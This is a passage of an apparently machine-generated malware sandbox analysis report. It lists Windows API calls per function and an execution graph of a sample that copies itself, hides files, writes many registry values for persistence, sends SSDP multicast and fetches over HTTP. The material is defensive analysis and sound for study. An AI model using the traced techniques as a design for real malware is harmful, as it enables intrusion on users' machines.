                                                                                                                                                                                              • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 1378416451-507759092
                                                                                                                                                                                              • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                              • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3980219359-0
                                                                                                                                                                                              • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                              • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2074799992-0
                                                                                                                                                                                              • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668019968-0
                                                                                                                                                                                              • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Send$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2121970615-0
                                                                                                                                                                                              • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                              • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2223660684-0
                                                                                                                                                                                              • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                                                                              • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 459949847-0
                                                                                                                                                                                              • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                              • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFreeInstanceString
                                                                                                                                                                                              • String ID: Microsoft Corporation
                                                                                                                                                                                              • API String ID: 586785272-3838278685
                                                                                                                                                                                              • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                              • String ID: %S%S
                                                                                                                                                                                              • API String ID: 1017111014-3267608656
                                                                                                                                                                                              • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                                                                                • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                              • String ID: TCP$UDP
                                                                                                                                                                                              • API String ID: 1519345861-1097902612
                                                                                                                                                                                              • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 528846559-507759092
                                                                                                                                                                                              • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                              • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 469056452-0
                                                                                                                                                                                              • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:14.9%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:1499
                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                              execution_graph 4458 407940 Sleep CreateMutexA GetLastError 4459 407976 ExitProcess 4458->4459 4460 40797e 6 API calls 4458->4460 4461 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4460->4461 4462 407a23 4460->4462 4463 407dcb RegOpenKeyExW 4461->4463 4464 407d9f RegSetValueExW RegCloseKey 4461->4464 4623 40f1b0 GetLocaleInfoA strcmp 4462->4623 4466 407e24 RegOpenKeyExW 4463->4466 4467 407df8 RegSetValueExW RegCloseKey 4463->4467 4464->4463 4469 407e51 RegSetValueExW RegCloseKey 4466->4469 4470 407e7d RegOpenKeyExW 4466->4470 4467->4466 4469->4470 4475 407ed6 RegOpenKeyExW 4470->4475 4476 407eaa RegSetValueExW RegCloseKey 4470->4476 4471 407a30 ExitProcess 4472 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4473 407b36 Sleep wsprintfW CopyFileW 4472->4473 4474 407a8c SetFileAttributesW RegOpenKeyExW 4472->4474 4480 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4473->4480 4481 407b7e SetFileAttributesW RegOpenKeyExW 4473->4481 4474->4473 4479 407ac8 wcslen RegSetValueExW 4474->4479 4477 407f03 RegSetValueExW RegCloseKey 4475->4477 4478 407f2f RegOpenKeyExW 4475->4478 4476->4475 4477->4478 4483 407f88 RegOpenKeyExW 4478->4483 4484 407f5c RegSetValueExW RegCloseKey 4478->4484 4485 407b29 RegCloseKey 4479->4485 4486 407afd RegCloseKey 4479->4486 4480->4461 4482 407c87 SetFileAttributesW RegOpenKeyExW 4480->4482 4481->4480 4487 407bba wcslen RegSetValueExW 4481->4487 4482->4461 4488 407cc3 wcslen RegSetValueExW 4482->4488 4490 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4483->4490 4491 40801f RegOpenKeyExW 4483->4491 4484->4483 4485->4473 4625 40f400 memset memset CreateProcessW 4486->4625 4492 407c1b RegCloseKey 4487->4492 4493 407bef RegCloseKey 4487->4493 4494 407d24 RegCloseKey 4488->4494 4495 407cf8 RegCloseKey 4488->4495 4490->4491 4497 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4491->4497 4498 4080d9 RegOpenKeyExW 4491->4498 4492->4480 4499 40f400 6 API calls 4493->4499 4494->4461 4500 40f400 6 API calls 4495->4500 4497->4498 4502 4081f0 RegOpenKeyExW 4498->4502 4503 40810a 8 API calls 4498->4503 4504 407c08 4499->4504 4505 407d11 4500->4505 4501 407b21 ExitProcess 4506 408221 8 API calls 4502->4506 4507 408307 Sleep 4502->4507 4503->4502 4504->4492 4508 407c13 ExitProcess 4504->4508 4505->4494 4509 407d1c ExitProcess 4505->4509 4506->4507 4537 40d180 4507->4537 4512 408322 9 API calls 4540 405c00 InitializeCriticalSection CreateFileW 4512->4540 5826 4077f0 4512->5826 5833 4058c0 4512->5833 5842 406f70 Sleep GetModuleFileNameW 4512->5842 4515 40848e 4519 4083d7 CreateEventA 4571 40c8b0 4519->4571 4528 40dbe0 330 API calls 4529 408438 4528->4529 4530 40dbe0 330 API calls 4529->4530 4531 408453 4530->4531 4532 40dbe0 330 API calls 4531->4532 4533 40846f 4532->4533 4614 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4533->4614 4535 408480 4631 40de90 4535->4631 4639 40d150 4537->4639 4541 405d25 4540->4541 4542 405c38 CreateFileMappingW 4540->4542 4553 40e0c0 CoInitializeEx 4541->4553 4543 405c59 MapViewOfFile 4542->4543 4544 405d11 4542->4544 4543->4544 4545 405c78 GetFileSize 4543->4545 4544->4541 4549 405c8d 4545->4549 4546 405d07 UnmapViewOfFile 4546->4544 4547 405c9c 4547->4546 4549->4546 4549->4547 4550 405ccc 4549->4550 4768 40d1d0 4549->4768 4775 405d30 4549->4775 4551 40ab60 __aligned_recalloc_base 3 API calls 4550->4551 4551->4547 5080 40e190 socket 4553->5080 4555 40e0e0 4556 4083d2 4555->4556 4559 40e12a 4555->4559 4565 40e168 4555->4565 5090 40e400 4555->5090 4566 407390 CoInitializeEx SysAllocString 4556->4566 5105 40b430 htons 4559->5105 4564 40eef0 24 API calls 4564->4565 5124 40ac80 4565->5124 4567 4073b2 4566->4567 4568 4073c8 CoUninitialize 4566->4568 5269 4073e0 4567->5269 4568->4519 5278 40c870 4571->5278 4574 40c870 3 API calls 4575 